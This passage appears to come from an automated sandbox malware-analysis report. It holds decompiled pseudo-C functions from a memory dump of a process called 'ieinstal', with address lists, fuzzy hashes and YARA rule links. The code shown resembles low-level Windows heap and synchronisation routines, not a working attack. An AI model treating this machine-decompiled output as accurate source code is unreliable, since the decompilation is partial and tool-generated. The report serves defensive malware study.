				_t68 = L1ED24620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                        0x1ed87016
                        0x1ed8701e
                        0x1ed8702b
                        0x1ed87033
                        0x1ed87037
                        0x1ed8703c
                        0x1ed8703e
                        0x1ed87041
                        0x1ed87045
                        0x1ed8704a
                        0x1ed87050
                        0x1ed87055
                        0x1ed8705a
                        0x1ed87062
                        0x1ed87062
                        0x1ed8705a
                        0x1ed87064
                        0x1ed87064
                        0x1ed87067
                        0x1ed87071
                        0x1ed87096
                        0x1ed8709b
                        0x1ed870a2
                        0x1ed870a6
                        0x1ed870a7
                        0x1ed870ad
                        0x1ed870b3
                        0x1ed870b6
                        0x1ed870bb
                        0x1ed870c3
                        0x1ed870c3
                        0x1ed870c6
                        0x1ed870cd
                        0x1ed870dd
                        0x1ed870e0
                        0x1ed870e2
                        0x1ed870e2
                        0x1ed870ee
                        0x1ed87101
                        0x1ed870f0
                        0x1ed870f9
                        0x1ed870f9
                        0x1ed8710a
                        0x1ed8710e
                        0x1ed87112
                        0x1ed87117
                        0x1ed87118
                        0x1ed87118
                        0x1ed870bb
                        0x1ed8711d
                        0x1ed87123
                        0x1ed87131
                        0x1ed87131
                        0x1ed87136
                        0x1ed8713d
                        0x1ed8713e
                        0x1ed8713f
                        0x1ed8714a
                        0x1ed8714a
                        0x1ed87084
                        0x1ed87088
                        0x00000000
                        0x1ed8708e
                        0x1ed8708e
                        0x1ed87092
                        0x00000000
                        0x1ed87092

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5cb6a57140ba9c1c429d27180206e62ead63ca44a2f3f26166f8214e9aa37ab1
                        • Instruction ID: 24ab8a8aafbc412800aa0fd5f8edd6e3cb6740fadb4fc79c4a9604cc91e423b6
                        • Opcode Fuzzy Hash: 5cb6a57140ba9c1c429d27180206e62ead63ca44a2f3f26166f8214e9aa37ab1
                        • Instruction Fuzzy Hash: 113192766047919BC310CF28C951E6AB7F5BF88700F014B29F895D7A90E730E914C7A5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED2C182, Relevance: .1, Instructions: 104COMMON
                        Download Yara Rule
                        C-Code - Quality: 68%
                        			E1ED2C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E1ED27D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E1EDD8D34(_v8, _t80);
					}
					E1ED22280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E1ED1FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E1EDD8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E1ED1FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E1ED4B180();
						if(_a4 != 0) {
							E1ED22280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E1ED2BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E1ED2BB2D(_t16, _t15);
						E1ED2B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E1ED1FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E1ED1FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E1ED1FFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                        0x1ed2c18d
                        0x1ed2c18f
                        0x1ed2c191
                        0x1ed2c19b
                        0x1ed2c1a0
                        0x1ed2c1d4
                        0x1ed2c1de
                        0x1ed72d6e
                        0x1ed2c1e4
                        0x1ed2c1e4
                        0x1ed2c1e4
                        0x1ed2c1ec
                        0x1ed72d7d
                        0x1ed72d7d
                        0x1ed2c1f3
                        0x1ed2c1ff
                        0x1ed72d88
                        0x1ed72d8d
                        0x1ed72d94
                        0x1ed72d94
                        0x1ed72d9f
                        0x1ed72da4
                        0x1ed72dab
                        0x1ed72db0
                        0x1ed72db2
                        0x1ed72db3
                        0x1ed72db4
                        0x1ed72dbc
                        0x1ed72dc3
                        0x1ed72dc3
                        0x1ed2c205
                        0x1ed2c205
                        0x1ed2c208
                        0x1ed2c20e
                        0x1ed2c211
                        0x1ed2c216
                        0x1ed2c219
                        0x1ed2c21f
                        0x1ed2c222
                        0x1ed2c22c
                        0x1ed2c234
                        0x1ed2c23a
                        0x1ed2c23f
                        0x1ed2c245
                        0x1ed2c24b
                        0x1ed2c251
                        0x1ed2c25a
                        0x1ed2c276
                        0x1ed2c27d
                        0x1ed2c27d
                        0x1ed2c25c
                        0x1ed2c25c
                        0x00000000
                        0x1ed2c25e
                        0x1ed2c1a4
                        0x1ed2c1aa
                        0x1ed2c1b3
                        0x1ed2c265
                        0x1ed2c26c
                        0x1ed2c26c
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                        • Instruction ID: 652d0751b36549b90b980ee84cf7c7899b6d477a1b4862a5715df87fd7e13a82
                        • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                        • Instruction Fuzzy Hash: E7314675A016C7AFD709CBF0C480BDAF755BF42208F44476AD01C4B280CB75AA49D7B1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED46DE6, Relevance: .1, Instructions: 101COMMON
                        Download Yara Rule
                        C-Code - Quality: 86%
                        			E1ED46DE6(signed int __ecx, void* __edx, signed int _a4, intOrPtr* _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t39;
				intOrPtr _t52;
				intOrPtr _t53;
				signed int _t59;
				signed int _t63;
				intOrPtr _t64;
				intOrPtr* _t66;
				void* _t68;
				intOrPtr _t69;
				signed int _t73;
				signed int _t75;
				intOrPtr _t77;
				signed int _t80;
				intOrPtr _t82;

				_t68 = __edx;
				_push(__ecx);
				_t80 = __ecx;
				_t75 = _a4;
				if(__edx >  *((intOrPtr*)(__ecx + 0x90))) {
					L23:
					asm("lock inc dword [esi+0x110]");
					if(( *(_t80 + 0xd4) & 0x00010000) != 0) {
						asm("lock inc dword [ecx+eax+0x4]");
					}
					_t39 = 0;
					L13:
					return _t39;
				}
				_t63 =  *(__ecx + 0x88);
				_t4 = _t68 + 7; // 0xa
				_t69 =  *((intOrPtr*)(__ecx + 0x8c));
				_t59 = _t4 & 0xfffffff8;
				_v8 = _t69;
				if(_t75 >= _t63) {
					_t75 = _t75 % _t63;
					L15:
					_t69 = _v8;
				}
				_t64 =  *((intOrPtr*)(_t80 + 0x17c + _t75 * 4));
				if(_t64 == 0) {
					L14:
					if(E1ED46EBE(_t80, _t64, _t75) != 1) {
						goto L23;
					}
					goto L15;
				}
				asm("lock inc dword [ecx+0xc]");
				if( *((intOrPtr*)(_t64 + 0x2c)) != 1 ||  *((intOrPtr*)(_t64 + 8)) > _t69) {
					goto L14;
				} else {
					_t73 = _t59;
					asm("lock xadd [eax], edx");
					if(_t73 + _t59 > _v8) {
						if(_t73 <= _v8) {
							 *(_t64 + 4) = _t73;
						}
						goto L14;
					}
					_t77 = _t73 + _t64;
					_v8 = _t77;
					 *_a12 = _t64;
					_t66 = _a8;
					if(_t66 == 0) {
						L12:
						_t39 = _t77;
						goto L13;
					}
					_t52 =  *((intOrPtr*)(_t80 + 0x10));
					if(_t52 != 0) {
						_t53 = _t52 - 1;
						if(_t53 == 0) {
							asm("rdtsc");
							 *_t66 = _t53;
							L11:
							 *(_t66 + 4) = _t73;
							goto L12;
						}
						E1ED36A60(_t66);
						goto L12;
					}
					while(1) {
						_t73 =  *0x7ffe0018;
						_t82 =  *0x7FFE0014;
						if(_t73 ==  *0x7FFE001C) {
							break;
						}
						asm("pause");
					}
					_t66 = _a8;
					_t77 = _v8;
					 *_t66 = _t82;
					goto L11;
				}
			}


















                        0x1ed46de6
                        0x1ed46dee
                        0x1ed46df1
                        0x1ed46df4
                        0x1ed46dfd
                        0x1ed805d3
                        0x1ed805d3
                        0x1ed805e4
                        0x1ed805f9
                        0x1ed805f9
                        0x1ed805fe
                        0x1ed46e96
                        0x1ed46e9c
                        0x1ed46e9c
                        0x1ed46e03
                        0x1ed46e09
                        0x1ed46e0c
                        0x1ed46e12
                        0x1ed46e15
                        0x1ed46e1b
                        0x1ed805a1
                        0x1ed46eb1
                        0x1ed46eb1
                        0x1ed46eb1
                        0x1ed46e21
                        0x1ed46e2a
                        0x1ed46e9f
                        0x1ed46eab
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed46eab
                        0x1ed46e2c
                        0x1ed46e34
                        0x00000000
                        0x1ed46e3d
                        0x1ed46e3d
                        0x1ed46e42
                        0x1ed46e4d
                        0x1ed805ac
                        0x1ed805b2
                        0x1ed805b2
                        0x00000000
                        0x1ed805ac
                        0x1ed46e56
                        0x1ed46e59
                        0x1ed46e5d
                        0x1ed46e5f
                        0x1ed46e64
                        0x1ed46e94
                        0x1ed46e94
                        0x00000000
                        0x1ed46e94
                        0x1ed46e6a
                        0x1ed46e6d
                        0x1ed805ba
                        0x1ed805bd
                        0x1ed805ca
                        0x1ed805cc
                        0x1ed46e91
                        0x1ed46e91
                        0x00000000
                        0x1ed46e91
                        0x1ed805c0
                        0x00000000
                        0x1ed805c0
                        0x1ed46e7e
                        0x1ed46e7e
                        0x1ed46e80
                        0x1ed46e86
                        0x00000000
                        0x00000000
                        0x1ed46eba
                        0x1ed46eba
                        0x1ed46e88
                        0x1ed46e8b
                        0x1ed46e8f
                        0x00000000
                        0x1ed46e8f

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8f5923ccfc62e11761a64181f477a9fcd764954153fe337c5a9bd4bea8846838
                        • Instruction ID: 74be42f99f1f44f2de04c01673c4624261960783d99c97afcd93e9495ebc8b58
                        • Opcode Fuzzy Hash: 8f5923ccfc62e11761a64181f477a9fcd764954153fe337c5a9bd4bea8846838
                        • Instruction Fuzzy Hash: 2131B230204205DFD714CF29C490A9AB7E6FFD5315B24CA6EE46A8B659DB31F806CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED3A70E, Relevance: .1, Instructions: 96COMMON
                        Download Yara Rule
                        C-Code - Quality: 92%
                        			E1ED3A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x1edf7b10; // 0x10
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x1edf7b10 = 8;
					 *0x1edf7b14 = 0x1edf7b0c;
					 *0x1edf7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x11
					E1ED3A990(0x1edf7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L1ED3A840(__edx, __ecx, __ecx, _t52, 0x1edf7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x1edf7b10; // 0x10
					_t3 = _t37 + 0x27; // 0x37
					__eflags = _t3 >> 5 -  *0x1edf7b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x1edf7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x37
						_v8 = _t4 >> 5;
						_t50 = L1ED24620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x1edf7b18 = _v8;
						_t8 = _t52 + 7; // 0x17
						E1ED4F3E0(_t50,  *0x1edf7b14, _t8 >> 3);
						_t28 =  *0x1edf7b14; // 0x77f07b0c
						__eflags = _t28 - 0x1edf7b0c;
						if(_t28 != 0x1edf7b0c) {
							L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x18
						 *0x1edf7b14 = _t50;
						_t48 = _v12;
						 *0x1edf7b10 = _t9;
						goto L6;
					}
					 *0x1edf7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                        0x1ed3a713
                        0x1ed3a714
                        0x1ed3a717
                        0x1ed3a71d
                        0x1ed3a720
                        0x1ed3a722
                        0x1ed3a727
                        0x1ed3a74a
                        0x1ed3a754
                        0x1ed3a75e
                        0x1ed3a768
                        0x1ed3a76a
                        0x1ed3a773
                        0x1ed3a78b
                        0x1ed3a790
                        0x1ed3a792
                        0x1ed3a741
                        0x1ed3a741
                        0x1ed3a743
                        0x1ed3a749
                        0x1ed3a749
                        0x1ed3a732
                        0x1ed3a73a
                        0x1ed3a797
                        0x1ed3a79d
                        0x1ed3a7a3
                        0x1ed3a7a9
                        0x1ed3a7b6
                        0x1ed3a7bc
                        0x1ed3a7ca
                        0x1ed3a7e0
                        0x1ed3a7e2
                        0x1ed3a7e4
                        0x1ed79bf2
                        0x00000000
                        0x1ed79bf2
                        0x1ed3a7ed
                        0x1ed3a7f2
                        0x1ed3a800
                        0x1ed3a805
                        0x1ed3a80d
                        0x1ed3a812
                        0x1ed79c08
                        0x1ed79c08
                        0x1ed3a818
                        0x1ed3a81b
                        0x1ed3a821
                        0x1ed3a824
                        0x00000000
                        0x1ed3a824
                        0x1ed3a7ae
                        0x00000000
                        0x1ed3a7ae
                        0x1ed3a73c
                        0x1ed3a73e
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2276a8feffa9e32f57fb9dc1f50fd09e5e37187295597ff9ec311cf8ddaabefe
                        • Instruction ID: e197dedd77d3c15bf9f91a8775eaf2ccb5c341cdd2621f20e5654f99954e6670
                        • Opcode Fuzzy Hash: 2276a8feffa9e32f57fb9dc1f50fd09e5e37187295597ff9ec311cf8ddaabefe
                        • Instruction Fuzzy Hash: D931A2F1B20251ABC711CF18C8E0F9577F9EB86710F260A59E056C7240D7B0A903CBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED0AA16, Relevance: .1, Instructions: 93COMMON
                        Download Yara Rule
                        C-Code - Quality: 95%
                        			E1ED0AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x1edfd360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x1edf7b9c; // 0x0
					_t53 = L1ED24620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E1ED4B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E1ED4F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L1ED16C59(_t53, _t51, _t58) != 0) {
							_t28 = E1ED35E50(0x1ecec338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E1ED3B230(_v32, _v28, 0x1ecec2d8, 1,  &_v24);
								_t28 = E1ED0F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                        0x1ed0aa25
                        0x1ed0aa29
                        0x1ed0aa2d
                        0x1ed0aa30
                        0x1ed0aa37
                        0x1ed0aa3c
                        0x1ed64458
                        0x1ed64458
                        0x1ed64472
                        0x1ed64474
                        0x1ed64476
                        0x1ed0aa64
                        0x1ed0aa74
                        0x1ed6447c
                        0x1ed64483
                        0x1ed64492
                        0x1ed0aa52
                        0x1ed0aa54
                        0x1ed0aa5e
                        0x1ed644a8
                        0x1ed644ad
                        0x1ed644af
                        0x1ed644b6
                        0x1ed644b6
                        0x1ed644b9
                        0x1ed644bc
                        0x1ed644cd
                        0x1ed644d3
                        0x1ed644d6
                        0x1ed644e1
                        0x1ed644e1
                        0x1ed644e6
                        0x1ed644e8
                        0x1ed644fb
                        0x1ed644fb
                        0x1ed644e8
                        0x00000000
                        0x1ed0aa5e
                        0x1ed64476
                        0x1ed0aa42
                        0x1ed0aa46
                        0x1ed0aa48
                        0x1ed0aa4c
                        0x00000000
                        0x00000000
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5b696159ba3a572f3c02d7c3c27b19dda9a9828927bc76dcf90b8721eeb72b25
                        • Instruction ID: 6806a4ec734d7c8bdd444bfab46c9e645dfed028da62f8c2dbc6107afeba03cc
                        • Opcode Fuzzy Hash: 5b696159ba3a572f3c02d7c3c27b19dda9a9828927bc76dcf90b8721eeb72b25
                        • Instruction Fuzzy Hash: 0B31E371A10259ABCB04CF64CD81ABFB7BAFF48700B114669F901EB280E774ED11CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED361A0, Relevance: .1, Instructions: 93COMMON
                        Download Yara Rule
                        C-Code - Quality: 97%
                        			E1ED361A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E1ED35E50(0x1ece67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E1EDD9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E1ED0F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                        0x1ed361b3
                        0x1ed361b5
                        0x1ed361bd
                        0x1ed361c3
                        0x1ed361c7
                        0x1ed361d2
                        0x1ed361ff
                        0x1ed361ff
                        0x1ed36201
                        0x1ed36207
                        0x1ed36207
                        0x1ed361d4
                        0x1ed361d9
                        0x00000000
                        0x00000000
                        0x1ed361df
                        0x1ed361e2
                        0x00000000
                        0x00000000
                        0x1ed361e6
                        0x1ed361e8
                        0x1ed361ee
                        0x1ed361ee
                        0x1ed361f9
                        0x1ed7762f
                        0x1ed77632
                        0x1ed77635
                        0x1ed77639
                        0x1ed77640
                        0x1ed7766e
                        0x1ed77675
                        0x00000000
                        0x00000000
                        0x1ed77681
                        0x1ed77689
                        0x1ed7768d
                        0x1ed77691
                        0x1ed77695
                        0x1ed77699
                        0x1ed776af
                        0x1ed776b5
                        0x1ed776b7
                        0x1ed776b7
                        0x1ed776d7
                        0x1ed776dc
                        0x00000000
                        0x1ed776dc
                        0x1ed776a2
                        0x1ed776a9
                        0x1ed77651
                        0x1ed77653
                        0x1ed77653
                        0x1ed77656
                        0x1ed77656
                        0x00000000
                        0x1ed77656
                        0x1ed77644
                        0x1ed77646
                        0x1ed77648
                        0x1ed77648
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 824466de51d61803a758f6a32ab813029c200b2cb86721055660693adf5bac38
                        • Instruction ID: 350d39ccd6f4bdb3f6bb93e0c4a792b2f2cafaec507214ec0a1418ff6028c83c
                        • Opcode Fuzzy Hash: 824466de51d61803a758f6a32ab813029c200b2cb86721055660693adf5bac38
                        • Instruction Fuzzy Hash: 11318FB2A093018FD350CF19C910B1AB7E6FB88B05F164E6DE9949B395D770E804CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED48EC7, Relevance: .1, Instructions: 92COMMON
                        Download Yara Rule
                        C-Code - Quality: 93%
                        			E1ED48EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x1edfd360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E1ED34E70(0x1edf86e4, 0x1ed49490, 0, 0);
					if( *0x1edf53e8 > 5 && E1ED48F33(0x1edf53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x1edf53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x1edf53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x1ecebc46;
						_t48 = E1ED87B9C(0x1edf53e8, 0x1ecebc46, _t67, 0x1edf53e8, _t70,  &_v140);
					}
				}
				return E1ED4B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                        0x1ed48ec7
                        0x1ed48ed9
                        0x1ed48edc
                        0x1ed48ee6
                        0x1ed48ee9
                        0x1ed48eee
                        0x1ed48efc
                        0x1ed48f08
                        0x1ed81349
                        0x1ed81353
                        0x1ed8135d
                        0x1ed81366
                        0x1ed8136f
                        0x1ed81375
                        0x1ed8137c
                        0x1ed81385
                        0x1ed81390
                        0x1ed81391
                        0x1ed8139c
                        0x1ed8139d
                        0x1ed813a6
                        0x1ed813ac
                        0x1ed813b2
                        0x1ed813b5
                        0x1ed813bc
                        0x1ed813bf
                        0x1ed813c2
                        0x1ed813c5
                        0x1ed813c8
                        0x1ed813cb
                        0x1ed813ce
                        0x1ed813d1
                        0x1ed813d4
                        0x1ed813d7
                        0x1ed813da
                        0x1ed813dd
                        0x1ed813e0
                        0x1ed813e3
                        0x1ed813e6
                        0x1ed813e9
                        0x1ed813f6
